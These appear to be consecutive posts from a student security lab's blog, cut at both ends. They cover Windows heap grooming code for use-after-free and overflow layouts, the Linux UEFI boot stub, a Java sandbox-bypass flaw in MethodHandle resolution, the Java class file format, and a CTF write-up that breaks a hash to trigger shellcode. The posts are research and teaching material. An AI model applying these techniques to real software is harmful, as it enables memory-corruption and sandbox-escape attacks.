This is really good for a use-after-free and we don’t have to fill all the space in the userblock. What about the overflow ? If we don’t free the chunk, after 0xff allocations, we will get back to the same point in the array, but this chunk will already be in use. At that point the allocation algorithm doesn’t take an other random number and keep trying, it will just take the first next free chunk which follow:
- First we activate the LFH
- Then we allocate the vulnerable chunk
- We allocate 0xff chunks
- We allocate the chunk we want to overflow
It will give us the following code:
#include <Windows.h> #include <stdio.h> #include <iostream> int main() { HANDLE hHeap = GetProcessHeap(); char c; int i = 0; int size = 0x40; LPVOID chunk; // activating the LFH for the size we choose while (i < 0x10) { chunk = HeapAlloc(hHeap, 0, size); i++; } // making the allocation which is vulnerable chunk = HeapAlloc(hHeap, 0, size); printf("vulnerable chunk: %p\n", chunk); // making 0xff allocation for getting back // to the same point in the RtlpLowFragHeapRandomData i = 0; while (i < 0x100 - 1) { chunk = HeapAlloc(hHeap, 0, size); HeapFree(hHeap, 0, chunk); i++; } // allocation we want to overwrite chunk = HeapAlloc(hHeap, 0, size); printf("chunk to overwrite: %p\n", chunk); }
Which will give us the result:
vulnerable chunk: 00559B20 chunk to overwrite: 00559B68
As you can see we have a gap of 8 bytes, those bytes are the size of the _HEAP_ENTRY struct which contains the meta-data of our block.
One of the best advantages of this technic is that we need only one chunk to overwrite and we know which one it is.
Conclusion
We have seen two ways of getting some determinism from the LFH. None of those solutions are perfect. Exploiting a use-after-free with this technic will not be much harder than before if we can have some heap-spray. Overflow is not that easy, even with the second solution we still have a chance to get the last chunk and our two blocks can be separated by an other allocated block. The best way of decreasing the risks is to append is to first fill a subsegment and then use the new one to trigger the overflow.
UEFI boot stub in Linux
As most of you know, the linux kernel is stored as a bzImage. This bzImage has been comprised of different files over the time, but it is usually the composition of two things:
The bit that interests us is the linux boot code, and how it paves the way for the kernel itself. You may consider that once the piggy.o (see later) object has been loaded at offset 0x100000, the basic bootloading job is done. But first, before tackling UEFI thematics, let’s go back a bit to the legacy booting processes.
I gave a conference about these matters in March. You can consult the slides at the following address. The prezi slides give a very good idea of where you are in the code, try it!
Legacy boot
Way, way back in 2.5.64
Even before people used window managers and all that fancy stuff, linux actually was a bootable image, meaning you could run
dd if=bzImage of=/dev/sda
and just boot off the thing. This required the 512 first bytes to be MBR-material, able to load the rest of the kernel itself. Using this technique, it was not possible to easily specify a command-line (and therefore a root filesystem, an initrd file or an init binary).The bzImage was composed as follow:
The piggy.o object contains the bulk of the kernel image. misc.o is a bunch of gzip routines for the decompression of the kernel.
The bootsect.o was a 512-bytes MBR. Since 2.5.65, it just prints an error message indicating that the feature is not supported anymore. arch/i386/boot has since 2.6.24 been moved into arch/x86/boot. bootsect.S and setup.S have been replaced by the header.S file since 2.6.23. The bootsect.S file performed only a few basic tasks:
- Relocated itself at address 0x9000 (bootsect.S:62)
- Loaded the setup.o code at address 0x9200 (bootsect.S:153).
- Loaded the system at address 0x100000 (bootsect.S:225)
The size of the setup.o code, which needs to be loaded in low-memory, is defined in the setup_sects field (bootsect.S:415).
After loading those two chunks in memory, the processor jumped into the setup.o code, at the symbol start_of_setup (setup.S:173). From here, it carried out a few tasks:
- Checked the memory layout with three different methods (e820h, e801h and 88h)
- Jumped in protected mode (setup.S:873) at offset 0x100000 (setup.S:905).
The code at 0x100000 (1Mo) is part of the startup_32 (head.S:31) routine, the first protected mode code in the kernel. It uses routines from misc.c to decompress the kernel in place and then re-jumps at 0x100000 (head.S:77), where the code from piggy.o has now been loaded.
The real world
As I previously said, the layout of the arch/i386/boot folder (as of today arch/x86/boot) changed drastically over the time.
The first change to take place was the nullification of the MBR, and starting at version 2.5.65, the 512 first bytes were only able to print out a bugger-off message. Between versions 2.6.22 and 2.6.23, the folder was totally revisited. A new file header.S was created, containing the now useless 512 bytes MBR and a bit of the setup.S code as well. The main change remains in the creation of a main.c file executing most of the initializations performed by the old setup.S regarding the BIOS mode, the memory detection, the video mode and such. The code in the main.c file then jumps in protected mode in the pm.c file (pm.c:149) via the goto_protected_mode stub. The head_32.S file is still very similar to the original head.S source: its job is to decompress the kernel in-place, thus placing piggy.o at 0x100000.
The bzImage is of the following composition according to my research and the compressed folder building files (Makefile:29 and vmlinux.lds.S):
Usual BIOS-enabled bootloaders startup
Let’s take a look at the syslinux sources to understand when and how the linux bzImage is loaded in memory by the bootloader itself. A big thanks to the guys from #syslinux on freenode for their help in finding the module loading and jumping into the kernel linux, the path was not obvious. It is split in two according to the setup_sects header (load_linux.c:243) in the first 512 bytes of the header.o file (header.S:264).
- The realmode code is loaded at an offset below 1M (load_linux.c:320)
- The command-line is loaded right behind this code (load_linux.c:344)
- The vmlinux.bin.gz file is loaded above 1M (load_linux.c:362)
Once this is done, the bootloader simply jump 512 bytes behind the beginning of the realmode code it copied into memory. This code will re-localize itself at 0x9000 offset according to the setup_move_size field (header.S:306) if the command-line address has not been specified in the command_line_ptr field (header.S:338). From then on, the kernel will follow the same route as when it was loaded as an image.
It might also be interesting to specify that the setup segment of the bootloading process is aware of the bootloader that loaded it previously thanks to the ext_loader_type field (header.S:335) (boot.txt:).
Conclusion
Well, all we thus far is that the BIOS-dependent bootloading process for linux is quite a mess. It is not trivial to follow the control flow and the bzImage loading is far from obvious. The drastic changes the boot folder underwent did not help me get a sense of what was going on. However, here comes UEFI.
The UEFI model
Introduction
The goal of the UEFI specification is first to unify the boot process and get rid of the mess the BIOS-dependent bootloading option is. When the IA64 architecture was designed, engineers from Intel thought it was time to get rid of the legacy 16bits to 32bits to 64bits booting process, and go straight into protected mode. However, as the IA64 architecture failed in favor of the AMD64, the idea of getting rid of the archaic firmware that is BIOS stuck, and after a few years, the EFI firmware became UEFI and development of this specification spread outside Intel.
The idea here is to provide an API more user-friendly to the programmer, with simple applications as Portables Executables (PE from Windows). Most of these applications are services (usually drivers) exposing to the user a bunch of devices such as a keyboard, a screen or the clock. They are initialized and ran automatically by the firmware. Other applications include a shell (enabling the user to start other applications), or bootloaders (it might be useful).
There are three types of application:
- Simple applications (type=10)
- Boot services (type=11)
- Runtime services (type=12)
Boot services are protocols (API to stay simple) designed to die when the boot process is done and the control is handed to the OS (via the
ExitBootServices()
routine.) These services include drivers such as text/graphical console, block devices and such. On the other hand, Runtime services are designed to stay reachable by the OS, even after a call toExitBootServices()
. These services provide access to the NvRAM for example, or drivers for the clock.The NvRAM stores a few variables, including the configuration for the boot manager. This boot manager reads the NvRAM to boot on a given application automatically. This configuration is alterable via the
efibootmgr
utility and allows the user to setup the bootloader order. This order usually defaults to:- Try to boot on floppy
- Try to boot on hard drive
- Try to boot on NIC0
- Run shell application
The user-defined applications and files are stored on a special
fat32
partition defined by the identifier0xEF
.UEFI: how to
As specified before, the code for an application is encapsulated in the PE format. This means the binary needs both the MZ and PE headers in order to be recognized as a valid efi executable. It needs to feature the .efi extension in the filesystem as well.
The compilation of such binaries can be achieved with the help of the gnu-efi library, which is exposing to the user headers the firmware-provided data structures and function prototypes, such as the main. It also includes a basic library I/O C library using the EFI-defined drivers to the peripherals.
The main prototype as defined by the gnu-efi library (ia32/efibind.h:250), and used in a sample ‘hello world’ application (apps/t.c:16):
EFI_STATUS efi_main (EFI_HANDLE image_handle, EFI_SYSTEM_TABLE *systab);
Arriving in that main, all the EFI features are available via the EFI_SYSTEM_TABLE (efiapi.h:866) structure. The firmware thus exposes directly an stdin/stdout/stderr via the
systab->{ConIn,ConOut,StdErr}
handles.The EFI_BOOT_SERVICES structure gives a reference to the different protocols and drivers to the user via the
LocateHandle()
andLocateProtocol()
functions. The EFI_RUNTIME_SERVICES structure yields directly access to the time and NvRAM variables.Booting without a bootloader: the EFI boot stub
As expected, the linux kernel obviously does not use the gnu-efi library. The idea behind the EFI boot stub is to fake the previously seen bzImage as a valid efi application. This means setting up a MZ+PE header and all kinds of sneaky, sneaky stuff.
The EFI boot stub became available as of linux 3.3. When compiling the kernel with options
CONFIG_EFI_STUB=y
, the header.S image features made up MZ+PE headers. The most important field, the AddressEntryPoint (header.S:144) is named efi_pe_entry in the source tree and is set by the tools/build.c program to either of the following (tools/build.c:274):- 0x010 (compressed/head_64.S:37) or (compressed/head_32:34). In the case of the head_64.S file, the EFI entry point is set to the 64 bits entry each time. However, a legacy bootloader will jump at 0x100000 and fall on the 32 bits entry which will do the jump into long mode and fall through in the (startup_64) routine. 64 bits legacy bootloader, however, will know enough to jump directly into startup_64.
- 0x210 (compressed/head_64:S:191),
The remaining problem here is that bootloaders usually provide a boot_params data structure. Here, the head_{32,64}.S files use a make_boot_params function (compressed/eboot.c:693) (compressed/head_64.S:214) (compressed/head_32.S:45) in order to setup this structure.
The processor then enters the efi_stub_entry, (compressed/head_64.S:221) (compressed/head_32.S:55) the offset of which also depends on the architecture adopted by the kernel (ia32 or amd64). As implemented since the boot protocol 2.11 (boot.txt:57) (boot.txt:1097), the kernel supports EFI handover, meaning bootloaders can yield the remainder of the boot process to the EFI boot stub. This is where efi_stub_entry intervenes, representing that entry point and being stored in the handover_offset (header.S:422) (boot.txt:728) if the xloadflags (header.S:371) is set accordingly (boot.txt:590).
The code beginning from the efi_stub_entry first calls efi_main (compressed/eboot.c:748) (not to be mistaken with the gnu-efi efi_main we talked about earlier,) which executes a basic initialization:
- Test if called by the UEFI firmware (might be called with efi_stub_entry as entry point.) Fail if not.
- Call to setup_graphics.
- Call to setup_efi_pci, which retrieves the main pci_handle (compressed/eboot.c:65) and fetches each individual device handle (compressed/eboot.c:85).
- Relocate the kernel code at the preferred address (compressed/eboot.c:783)
- Load the dummy GDT and disable interrupts (compressed/eboot.c:857).
- Performs the call to
ExitBootServices()
needed for the firmware to let go of the control (compressed/eboot.c:800) (compressed/eboot.c:710).
After exiting efi_main successfully, the processor just jumps in the newly relocated kernel, according to the values in the boot_params (asm/bootparams.h:111) structure, stored in %eax at exit (compressed/head_64.c:233).
LSE Week 2014: Schedule
Our schedule for the LSE Week 2014 is out !
The schedule will be as follow:
- July, Thursday the 17th in the evening
- July, Friday the 18th in the evening
- July, Saturday the 19th all day long
The complete schedule is available on the page dedicated to the event
Lightning Talks Tuesday 13 2014
As you might have already noticed, this month lightning talks will take place on the 13th, meaning the second tuesday of the month. This will be the case each month from now on for logistical reasons.
The program will be as follow:
- Heartbleed, technical overview by Bruno Pujos. Abstract: An explanation of the Heartbeat extension and how the Heartbleed bug is working, what kind of information can leak from it, and why it has not been found earlier.
- Anti-Virtual Machine Techniques by Pierre Rovis. Abstract: An overview of some of the techniques being used by malwares to recognize virtual machine environments, how they work and what they are detecting.
Those conferences will take place in IP 11 from 7:30 PM.
LSE Week 2014 announcement
For the fourth year, we are going to give 3 days of talks to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The schedule will be as follow:
- July, Thursday the 17th in the evening
- July, Friday the 18th in the evening
- July, Saturday the 19th all day long
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
If you want to propose a talk, you can contact us at contact@lse.epita.fr or on #lse@rezosup. The deadline for submitting content is June 8.
Issue 54 in Java
Introduction
One of the quite recent (at least, not too old) and amusing things to look at when you are beginning to study security in java is the issue 54 from Security Exploitation. This issue is quite interesting, because it is a low level trick and is, so far, not patched.
Security in java
Before talking about this particular issue, let’s see some basics about security in Java in general.
The first thing to know is what and why are we attacking java? Java is designed to run code from untrusted sources securely. This is a well known property and you can find it “everyday” in your browser with the java applets. When an applet is downloaded from a website the browser will run it and you don’t want a potentially malicious attacker to have full permissions under your machine.
Java implements a system of permissions to limit possibilities for the code executed with unprivileged rights (the applet). The goal for an attacker will be to acquire full privileges from an unprivileged application, allowing full jeopardy of the computer. The traditionnal attacks (overflow, use-after-free…) are still working but there is an additional type which is less common : the sandbox bypass (which can itself be divided in several parts: unsafe reflection, least privilege violation…).
The security of Java is based on several things, the first is the gestion of the memory which is handled by the JVM (Java Virtual Machine) and not by the user. It first avoids most of the stupid errors developers can make, but it is also mandatory for running code safely (if we can do what we want with the memory we already have the same privilege that the program).
The second part of the security is handled at the loading of a class. This loading process is divided into two parts: the class loader and the bytecode verifier.
The class loader has a similar goal as the dynamic linker in Unix systems. There are several implementations (classes) of the class loader, like the applet class loader which can load code over the internet from a website. All class loaders inherit from
java.lang.ClassLoader
. Of course, a class loader has to take some precautions not to execute malicious code. In particular, it will have to check that we are not trying to spoof a System class which would allow us to bypass all security protections.During the validation step by the class loader, the bytecode will be checked by the bytecode verifier. It is called from the class loader through the method
defineClass
. It will not perform any check of logic but only check that the bytecode is valid and other various things, for example that it is not overflowing the stack. Once the bytecode verifier has done his work, if the class loader validates the class, the code is considered to be of no harm to the JVM (this doesn’t mean you have all the privileges).The last important part in java security is the security manager, it’s the part which will check all the permissions during runtime. If unprivileged code tries to do something forbidden, it will raise an exception. The basic class for the security manager is
java.lang.SecurityManager
Usually, the security manager will be retrieved by a call togetSecurityManager
(java.lang.System
).If the security manager is set to
null
, no check is performed and the code runs with full privileges. Therefore, the goal of a lot of exploits will be to rewrite the security manager tonull
. Some permissions allow to change the security manager and to set it tonull
(AllPermission
,setSecurityManager
,createClassLoader
,accessClassInPackage.sun
…). Typically, a permission check looks like this:::java // From AppletClassLoader.java SecurityManager sm = System.getSecurityManager(); if (sm != null) sm.checkPackageAccess(name.substring(0, i));
The method
checkPackageAccess
and all the other check functions will throw an error if the code doesn’t have the rights to perform the action desired. The check looks into the stack-call and if it finds an unprivileged function, it throws an exception. To go from unprivileged code to privileged code, Java uses theActionController.doPrivileged
method:::java AccessController.doPrivileged(new PrivilegedAction() { public Object run() { // insert priviledge code here } });
This check is performed by the security manager and will stop at the first doPrivileged it finds.
The MethodHandle resolution mecanism
In the constant pool of a class file it is possible to define a
MethodHandle
. This entry in the constant pool contains two elements: the reference kind and the reference index. The reference kind characterizes the bytecode behavior of the methodhandle, there are 9 possible kinds, as follow:REF_getField REF_getStatic REF_putField REF_putStatic REF_invokeVirtual REF_invokeStatic REF_invokeSpecial REF_newInvokeSpecial REF_invokeInterface
All 9 kinds are used to get a
MethodHandle
. This object can reference not only methods but also fields, constructors “and similar low-level operations”. The kinds 1 to 4 are used to create aMethodHandle
on a field and the reference index must point to aCONSTANT_Fieldref
. For kinds 5 to 8 the reference index must point to aCONSTANT_Methodref
. It is used to get aMethodHandle
on a method.The last kind (
REF_invokeInterface
) is used forCONSTANT_InterfaceMethodref
and returns aMethodHandle
for an interface method. The interesting part about the use of aCONSTANT_MethodHandle
into the constant pool is that the creation of theMethodHandle
is done at the loading of the class file. Theoretically, it should make no difference between retrieving theMethodHandle
at the loading of the class and after the loading. We will see that it’s not the case.Issue 54: the vulnerability
The issue 54 has been found by Security Exploitation and is well documented (http://www.security-explorations.com/materials/se-2012-01-54.pdf). The usual way to get a Method Handler of a function in a class is to call the public method
findVirtual
from theMethodHandles.Lookup
module. The code of this method is the following:::java public MethodHandle findVirtual(Class<?> refc, String name, MethodType type) throws NoSuchMethodException, IllegalAccessException { MemberName method = resolveOrFail(refc, name, type, false); checkSecurityManager(refc, method); return accessVirtual(refc, method); }
In this code we can see the call to the method
checkSecurityManager
which checks whether the calling code has the right to get theMethodHandle
. In particular, it will forbid to get aMethodHandle
on a private method of a super-class. On the other hand, when getting a MethodHandle at class loading with aREF_invokeVirtual
, the method called isresolveVirtual
:::java private MethodHandle resolveVirtual(Class<?> refc, String name, MethodType type) throws NoSuchMethodException, IllegalAccessException { MemberName method = resolveOrFail(refc, name, type, false); return accessVirtual(refc, method); }
We can see that the only difference between these two functions is the call to the
checkSecurityManager
function which is not done in theresolveVirtual
method. TheresolveVirtual
function is of course private but during loading it is called by the class loader. That means that a specially crafted class can get virtual and static methods (the same issue exists with findStatic and resolveStatic) from a class, allowing to have a validMethodHandle
on something we shouldn’t have had access to.This issue is also present in most of the different kinds of
CONSTANT_MethodHandle
entries in the constant pool of a class file. Still, this issue alone does not allow to execute code from an untrusted source as privileged. When Security Exploitation reported that vulnerability, they used a second one (Issue 55 http://www.security-explorations.com/materials/SE-2012-01-ORACLE-10.pdf) to get the execution of code as privileged. The issue 55 allows to bind aMethodHandle
to an object instance of incompatible type. This could allow to set the securitymanager to null, bypassing all the permission protection.Issue 54: the exploitation
With this issue, Security Exploitation has released a demonstration of the the issues 54 and 55 (http://www.security-explorations.com/materials/se-2012-01-50-60.zip). In particular, it contains a class
MyCL.class
which is “hand made”, and contains the exploitation of issue 54. Here is the constant pool of this class:::java CONSTANT_MethodRef(10) 5, 16 CONSTANT_MethodRef(10) 5, 17 CONSTANT_String(8) 10 CONSTANT_Class(7) 18 CONSTANT_Class(7) 19 CONSTANT_Utf8(1) 6 : <init> CONSTANT_Utf8(1) 3 : ()V CONSTANT_Utf8(1) 4 : Code CONSTANT_Utf8(1) 15 : LineNumberTable CONSTANT_Utf8(1) 5 : dummy CONSTANT_Utf8(1) 57 : (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)V CONSTANT_Utf8(1) 18 : get_defineClass_mh CONSTANT_Utf8(1) 20 : ()Ljava/lang/Object; CONSTANT_Utf8(1) 10 : SourceFile CONSTANT_Utf8(1) 9 : MyCL.java CONSTANT_NameAndType(12) 6, 7 CONSTANT_NameAndType(12) 20, 21 CONSTANT_Utf8(1) 4 : MyCL CONSTANT_Utf8(1) 21 : java/lang/ClassLoader CONSTANT_Utf8(1) 11 : defineClass CONSTANT_Utf8(1) 73 : (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class; CONSTANT_MethodHandle(15) REF_invokeVirtual(5), 2
We can see that the entry 22 is a
CONSTANT_MethodHandle1
with the kindREF_invokeVirtual
for exploiting the vulnerability and refer to theCONSTANT_MethodRef
at the entry 2, which is in the class java.lang.ClassLoader the methoddefineClass
.The
defineClass
method injava.lang.ClassLoader
is a protected final method and it should be impossible to have an handle on this method and obviously to call it.In
MyCL.class
we have three methods :<init>
which is for the initialisationdummy
get_defineClass_mh
which returns theCONSTANT_MethodHandle
at the entry 22 of the constant pool.
The other part of the exploit is for the issue 55 which will allow to bind the method handle to another class and get it called with privileged rights, allowing a sandbox bypass.
Conclusion
This issue, even if a little old, is really interesting because it puts in light some internals of the class loading process which are often unclear. It is also really disturbing because Oracle doesn’t seem to consider this issue as a problem, indicating that this was an “allowed behavior”. Still not patched, this issue can be used for developing exploits, enlarging the possibility for finding vulnerabilities. Even if this issue was basically focused on a MethodHandle pointing to a method, the same problem exists with MethodHandle pointing on a field, allowing to gain even more access.
0xCAFEBABE ? - java class file format, an overview
Lately, we’ve been having a look into java. First, we tried to understand the file-format. A java application is often presented in a .jar, which is basically a zip archive (you can also find .war files which are also zip archive). Inside this archive you’ll find several files, especially some .class files which are the one containing the java bytecode. Those files are the one we’ll look into.
The file begins with a header including the magic number (
0xCAFEBABE
), the minor version which is 0 and the major version for Java SE 7:0x0033
(51.00). Every number in the class file are stored in big-endian. Right after that header, we can find the Constant Pool count which is the number of entries in the constant pool table plus one and then the array. There are several entries representing several items in the constant pool like constants, classes, etc..After that, there is the access flag of the class, the
this_class
andsuper_class
identifiers which are indices in the constant pool in order to refer to the current class and the super class. This is followed by the interface table and its size, the table contains all the interfaces from which the current class inherits. Then we find the field table and size, followed by the methods and the attributes of the class.Here is mainly an overview of the class file.
Constant Pool
The constant pool is probably the most important part of the Class file. It contains all the information that will be needed on the other part of the file. The constant pool is an array containing several entries, the index of the array starts at 1, not 0. The different structures in the table do not have the same size, and so the constant pool may have a variable size. Each entry begins with a tag on one byte, indicating the type of entry:
-
CONSTANT_Utf8
: indicating an utf8 modified entry. Java uses a particular type of utf8 for representing the constant string values. -
CONSTANT_Integer
: representing a constant integer on 4 bytes, just like everything in the class file format the integer is a big-endian. -
CONSTANT_Float
: representing a float on 4 bytes, it follows the IEEE 754 floating point format, with possibility of representing both infinity and NaN. -
CONSTANT_Long
: same asCONSTANT_Integer
but represents the integer on 8 bytes. Something particular about this entry is that it is counting twice in the constant pool’s number of entries. -
CONSTANT_Double
: asCONSTANT_Float
it follows the IEEE 754 for the double format, likeCONSTANT_Long
it stores the number on 8 bytes and also counts twice in the constant pool. -
CONSTANT_Class
: this one is used to represent a class or an interface, it has only one caracteristic which is an index in the constant pool to aCONSTANT_Utf8
indicating the name of the class. -
CONSTANT_String
: its goal is to represent constant object of string type. likeCONSTANT_Class
, it only contains one information which is the index of aCONSTANT_Utf8
in the constant pool to represent the string’svalue. -
CONSTANT_Fieldref
: this represents a reference to a field. it contains the index ofCONSTANT_Class
to represent the class or interface in which the field is and the index of aCONSTANT_NameAndType
(see below) for representing the name and the field’s type. (http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-4.html#jvms-4.3.2). -
CONSTANT_Methodref
: likeCONSTANT_Fieldref
, it contains aCONSTANT_Class
index and aCONSTANT_NameAndType
. TheCONSTANT_Class
must represent a class and not an interface. TheCONSTANT_NameAndType
must represent a method descriptor (http://docs.oracle.com/javase/specs/jvms/se7/html/jvms-4.html#jvms-4.3.3). -
CONSTANT_InterfaceMethodref
: it is similar to theCONSTANT_Methodref
type except that theCONSTANT_Class
entry must represent an interface. -
CONSTANT_NameAndType
: this structure is used to represent a field or method without indicating the class or interface it belongs to, it contains two indices in the constant pool which must have the typeCONSTANT_Utf8
, the first represents the name and the other one represents a valid descriptor of the field or the method. -
CONSTANT_MethodHandle
: this field is used to resolve symbolic reference to a method handle. The way of resolving a method depends on something called the bytecode behavior which is indicated by a kind indicator (from 1 to 9). It also contains a reference on two bytes which is an index in the constant pool pointing on aCONSTANT_Fieldref
,CONSTANT_Methodref
orCONSTANT_InterfaceMethodref
depending on the kind. -
CONSTANT_MethodType
: this field is used to resolve the method’s type, it contains an index to aCONSTANT_Utf8
which should represent the method’s type. -
CONSTANT_InvokeDynamic
: this structure is used by the invokedynamic instruction to specify a bootstrap method. It contains an index into the bootstrap method table (see attributes below) and an index into the constant pool to aCONSTANT_NameAndType
representing the method name and method descriptor.
Here is global overview of each of those structures:
General and Interfaces
After the Constant Pool, we can find several information about the current class, there is an information about the class name and the superclass. There are also general information about the class in the access flag. There are several access flag types for classes, fields and methods. The different kind of access flags are:
After the general information field, there is an information field about the interfaces. All the interfaces the class implements are represented in the interface table. Each entry in that table is a constant pool index representing a
CONSTANT_Class
which must be an interface.Attributes
Each field, method and class have others characteristics and informations. These information are contained inside attributes. There are several attribute types, each one of them can be applied to one or several fields, methods, classes and codes. The attributes are used to represent :
- Code
- Local variables, constant value, information about the stack and exceptions
- Inner Classes, Bootstrap Methods, Enclosing methods
- Annotations
- Information for debug/decompilation
- Complementary information (Deprecated, Signature…)
Each attribute begins by an index into the constant pool, it must point to a
CONSTANT_Utf8
entry telling which type of attribute this is. Afterward, since the different types of attributes have different structures, the attribute length is indicated. An implementation of the Java Virtual Machine is not necessary in order to handle each kind of attribute because knowing the length allows to pass an unhandle attribute and execute correctly the file.The most important attribute is probably the Code:
It begins with the common header, the attribute name index should point to a
CONSTANT_Utf8
representing the string"Code"
.It is followed by two variables: max stack and max locals which represent the stack size and the size of the local variables including the one used for passing arguments to methods. Then there is the code length and the code which is the bytecode that will be executed by the JVM when the method is called.
Right after that, you’ll find a table representing the exception handlers inside the functions, it indicates the start and the end of the zone where the exception should be catched, the start of the entry if the exception is raised and the catch type which is an index to a
CONSTANT_Class
into the constant pool. The catch type can also be 0, in this case it will be called with every exceptions, this is in generally used for the finally statement.After the exceptions section, it is possible to add some attributes for the code especially about the stack and the local variable. The Code is an attribute that may contain other attribute.
Fields & Methods
The fields and methods are added in two tables which contain the same elements. The access flags are different for the fields and methods since they are represented above.
After the flag section, we find the name which is an index to a
CONSTANT_Utf8
in the constant pool representing the name of the method/field. The descriptor index is also an index to aCONSTANT_Utf8
which represents a descriptor defining the method or field type.Finally, the method and field can have attributes, moreover a method will contain a code attribute which will contain itself the method code.
Conclusion
The class file is really important for the JVM and having a look at the file format explains a lot of things about the way the JVM work internally.
Recently Java SE 8 has been released, there are several small differences with Java SE 7 even though the major part of the class file has not changed. In particular, it defines new attributes :
RuntimeVisibleTypeAnnotations
,RuntimeInvisibleTypeAnnotations
andMethodParameters
.There are also several modifications in different sections changing the default behaviour of the JVM. It also adds precision and constraints to parts of the class file. The version number for Java SE 7 is 51.00 and 52.00 for Java SE 8.
We’ve written a parser of the class file format in Python3 that you can find here : java.py.
It uses the srddl module for python, available here : https://bitbucket.org/kushou/srddl
-
Lightning Talks Tuesday, 1st April
Here is the lightning talk program for the 1st April :
- Portable Executable: Overview of the executables files on Windows. by Jérémy Lefaure
- A first peek at asymmetric cryptography: The RSA cryptosystem. by Fabien Goncalves
- Introduction to Register Transfer Level: a simple way to design synchronous digital circuits. by Pierre Surply
- Analysing unknown data with python. by Rémi Audebert
Talks will start in amphi 4, at 19h30.
And here are the slides from last time :
Lightning Talks at EPITA, Tuesday, March 4th 2014
Every month, on the first Tuesday of the month, we will have a lightning talk session.
Last Month (February 11th) we had :
- Introduction to TI PRUSS by Pierre Surply - Slides
- PS/2 Archeology by Gabriel Laskar - Slides
- IDAPython walkthrough by Bruno Pujos
On Tuesday, we will have :
- Malloc Internals by Bruno Pujos
- vsyscall/vDSO by Adrien Schildknecht
- Qemu integrated testing: liqtest / libqos by Nassim Eddequiouaq
Talks will start in amphi 1, at 19h30.
Olympic-CTF 2014: zpwn (200 points)
This exercise was based on an IBM s/390 ELF running on a remote server which listens on UDP port 31337.
The first thing we did was to setup Hercules, an open source software implementation of the mainframe System/370 and ESA/390 architectures, to run a linux distribution. After some tries with Debian and openSUSE, we finally succeeded to set up Fedora 20 on this emulator.
Reversing ELF
At first sight, the binary seems to send the entire buffer sent by the client via UDP.
After disassembling it, we saw that the buffer is hashed and compared to a constant value: if the hash is equal to
0xfffcecc8
then the process jumps into the received buffer instead of sending it back./* Receive buffer via UDP */ 80000b26: a7 49 20 00 lghi %r4,8192 ; len 80000b2a: b9 04 00 2a lgr %r2,%r10 ; sockfd 80000b2e: b9 04 00 3b lgr %r3,%r11 ; buff 80000b32: a7 59 00 00 lghi %r5,0 ; flags 80000b36: b9 04 00 69 lgr %r6,%r9 ; src_addr 80000b3a: a7 18 00 10 lhi %r1,16 80000b3e: 50 10 f0 cc st %r1,204(%r15) 80000b42: c0 e5 ff ff fe 51 brasl %r14,800007e4 <recvfrom@plt> 80000b48: b9 14 00 42 lgfr %r4,%r2 80000b4c: b9 02 00 44 ltgr %r4,%r4 80000b50: a7 84 00 1d je 80000b8a 80000b54: b9 04 00 5b lgr %r5,%r11 80000b58: a7 28 ff ff lhi %r2,-1 80000b5c: b9 04 00 34 lgr %r3,%r4 /* Hash buffer */ 80000b60: 43 10 50 00 ic %r1,0(%r5) 80000b64: 41 50 50 01 la %r5,1(%r5) 80000b68: 17 12 xr %r1,%r2 80000b6a: 88 20 00 08 srl %r2,8 80000b6e: b9 84 00 11 llgcr %r1,%r1 80000b72: eb 11 00 02 00 0d sllg %r1,%r1,2 80000b78: 57 21 c0 00 x %r2,0(%r1,%r12) 80000b7c: a7 37 ff f2 brctg %r3,80000b60 80000b80: c2 2d ff fc ec c8 cfi %r2,-201528 ; Compare hash to 0xfffcecc8 80000b86: a7 84 00 14 je 80000bae /* Send buffer via UDP if hash(buffer) != 0x31eedfb4 */ 80000b8a: b9 04 00 2a lgr %r2,%r10 ; sockfd 80000b8e: b9 04 00 3b lgr %r3,%r11 ; buff 80000b92: a7 59 00 00 lghi %r5,0 ; flags 80000b96: b9 04 00 69 lgr %r6,%r9 ; dest_addr 80000b9a: a7 19 00 10 lghi %r1,16 80000b9e: e3 10 f0 a0 00 24 stg %r1,160(%r15) 80000ba4: c0 e5 ff ff fe 70 brasl %r14,80000884 <sendto@plt> 80000baa: a7 f4 ff bb j 80000b20 /* Jump into buffer if hash(buffer) == 0xfffcecc8 */ 80000bae: 0d eb basr %r14,%r11 80000bb0: a7 f4 ff b8 j 80000b20
Breaking the hash
When we look closer to the hash function, we can see that
%r2
register is initialized to0xffffffff
and then xored with some values located in.rodata
. Because%r2
is right shifted before eachxor
operation, it is easy to find the location of this data by applying a reversed version of this algorithm and analysing the most significant byte of each%r2
value.800010e0: ff 0f 6a 70 ^ ff fc ec c8 -------------- 00 f3 86 b8 ----\ | | srl 8 80000dc4: f3 b9 71 48 | ^ f3 86 b8 xx <-/ -------------- 00 3f c9 xx ----\ | | srl 8 80001014: 3f b5 06 dd | ^ 3f c9 xx xx <-/ -------------- 00 7c xx xx 800010b4: 7c dc ef b7
Then, we deduced that these values are located at
800010b4
,80001014
,80000dc4
and800010b4
. We could now apply the right algorithm to get the real values of%r2
.(0xffffffff >> 8) ^ 0x7cdcefb7 = 0x7c231048 (0x7c231048 >> 8) ^ 0x3fb506dd = 0x3fc925cd (0x3fc925cd >> 8) ^ 0xf3b97148 = 0xf386b86d (0xf386b86d >> 8) ^ 0xff0f6a70 = 0xfffcecc8
The less significant byte of this values must now be xored with each offset to obtain the key.
Offsets: (0x800010e0 - 0x80000d7c) >> 2 = 0xd9 (0x80000dc4 - 0x80000d7c) >> 2 = 0x12 (0x80001014 - 0x80000d7c) >> 2 = 0xa6 (0x800010b4 - 0x80000d7c) >> 2 = 0xce Key: 0xcea612d9 ^ 0xff48cd6d = 0x31eedfb4
So, when this process receives
0x31eedfb4
via UDP, it jumps to the buffer address.To prevent SIGSEGV or SIGILL when the process executes the first instruction of shellcode, we first need to complete the opcode
0xdfb4
to get a valid instruction:31 ee lner %f14,%f14 df b4 0f 00 00 00 edmk 0(181,%r15),0
Exploit
Here is the python script that we used to generate shellcodes using
s390-linux-as
ands390-linux-objcopy
